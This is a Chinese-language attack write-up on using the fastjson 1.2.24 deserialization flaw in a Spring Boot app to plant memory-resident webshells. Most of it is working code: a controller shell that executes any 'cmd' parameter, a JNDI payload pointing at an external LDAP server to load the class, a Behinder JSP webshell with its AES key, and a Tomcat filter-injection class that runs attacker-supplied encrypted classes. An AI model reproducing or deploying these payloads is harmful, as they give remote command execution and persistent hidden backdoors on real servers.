环境:
springboot版本2.4.5
<parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.4.5</version><relativePath/> <!-- lookup parent from repository -->
</parent>
fastjson版本1.2.24
<dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.24</version>
</dependency>
Test.java(内存马)
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.lang.reflect.Method;public class Test {public Test() throws ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException {WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);Method method = Test.class.getDeclaredMethod("test", HttpServletRequest.class, HttpServletResponse.class);PatternsRequestCondition url = new PatternsRequestCondition("/hahaha");RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);r.registerMapping(info, new Test("aaa"), method);}private Test(String aa){// 不这样的话,上面22行会一直重复创建Test()对象,导致内存溢出}public void test(HttpServletRequest request, HttpServletResponse response) throws IOException {String cmd = request.getParameter("cmd");if(cmd != null){Process exec = Runtime.getRuntime().exec(cmd);InputStream inputStream = exec.getInputStream();DataInputStream dataInputStream = new DataInputStream(inputStream);String disr = dataInputStream.readLine();while ( disr != null ) {response.getWriter().write(disr);disr = dataInputStream.readLine();}}else {response.getWriter().write("ADD CONTROLLER");}}
}
POST /test/hello HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 283json={"a":{"@type": "java.lang.Class","val": "com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName": "ldap://116.xx.xx.xx:8888/Test","autoCommit": true}
}
可以看的spring内存马注入成功
注意springboot版本过高注入失败,会报错
我们版本不变,换个内存马再打一遍
可以看到报错了,报错为
Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is com.alibaba.fastjson.JSONException: set property error, autoCommit] with root cause
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
BehinderFilter_bx2.java:
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Field;
import org.apache.catalina.core.StandardContext;
import java.lang.reflect.InvocationTargetException;
import java.io.IOException;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import java.lang.reflect.Constructor;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.Context;
import javax.servlet.*;
import java.lang.reflect.Method;
import java.util.*;
import javax.crypto.*;
import javax.crypto.spec.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;public class BehinderFilter_bx2 extends AbstractTranslet implements Filter {static {try {final String name = "evil";final String URLPattern = "/*";WebappClassLoaderBase webappClassLoaderBase =(WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();Class<? extends StandardContext> aClass = null;try{aClass = (Class<? extends StandardContext>) standardContext.getClass().getSuperclass();aClass.getDeclaredField("filterConfigs");}catch (Exception e){aClass = (Class<? extends StandardContext>) standardContext.getClass();aClass.getDeclaredField("filterConfigs");}Field Configs = aClass.getDeclaredField("filterConfigs");Configs.setAccessible(true);Map filterConfigs = (Map) Configs.get(standardContext);BehinderFilter_bx2 behinderFilter = new BehinderFilter_bx2();FilterDef filterDef = new FilterDef();filterDef.setFilter(behinderFilter);filterDef.setFilterName(name);filterDef.setFilterClass(behinderFilter.getClass().getName());/*** 将filterDef添加到filterDefs中*/standardContext.addFilterDef(filterDef);FilterMap filterMap = new FilterMap();filterMap.addURLPattern(URLPattern);filterMap.setFilterName(name);filterMap.setDispatcher(DispatcherType.REQUEST.name());standardContext.addFilterMapBefore(filterMap);Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);constructor.setAccessible(true);ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);filterConfigs.put(name, filterConfig);} catch (NoSuchFieldException ex) {ex.printStackTrace();} catch (InvocationTargetException ex) {ex.printStackTrace();} catch (IllegalAccessException ex) {ex.printStackTrace();} catch (NoSuchMethodException ex) {ex.printStackTrace();} catch (InstantiationException ex) {ex.printStackTrace();}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {try {System.out.println("Do Filter ......");// 获取request和response对象HttpServletRequest request = (HttpServletRequest) servletRequest;HttpServletResponse response = (HttpServletResponse)servletResponse;HttpSession session = request.getSession();//create pageContextHashMap pageContext = new HashMap();pageContext.put("request",request);pageContext.put("response",response);pageContext.put("session",session);if (request.getMethod().equals("POST")) {String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u", k);Cipher c = Cipher.getInstance("AES");c.init(2, new SecretKeySpec(k.getBytes(), "AES"));//revision BehinderFilterMethod method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);method.setAccessible(true);byte[] evilclass_byte = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));Class evilclass = (Class) method.invoke(this.getClass().getClassLoader(), evilclass_byte,0, evilclass_byte.length);evilclass.newInstance().equals(pageContext);}}catch (Exception e){e.printStackTrace();}filterChain.doFilter(servletRequest, servletResponse);System.out.println("doFilter");}@Overridepublic void destroy() {}}
效果:
成功注入冰蝎内存马
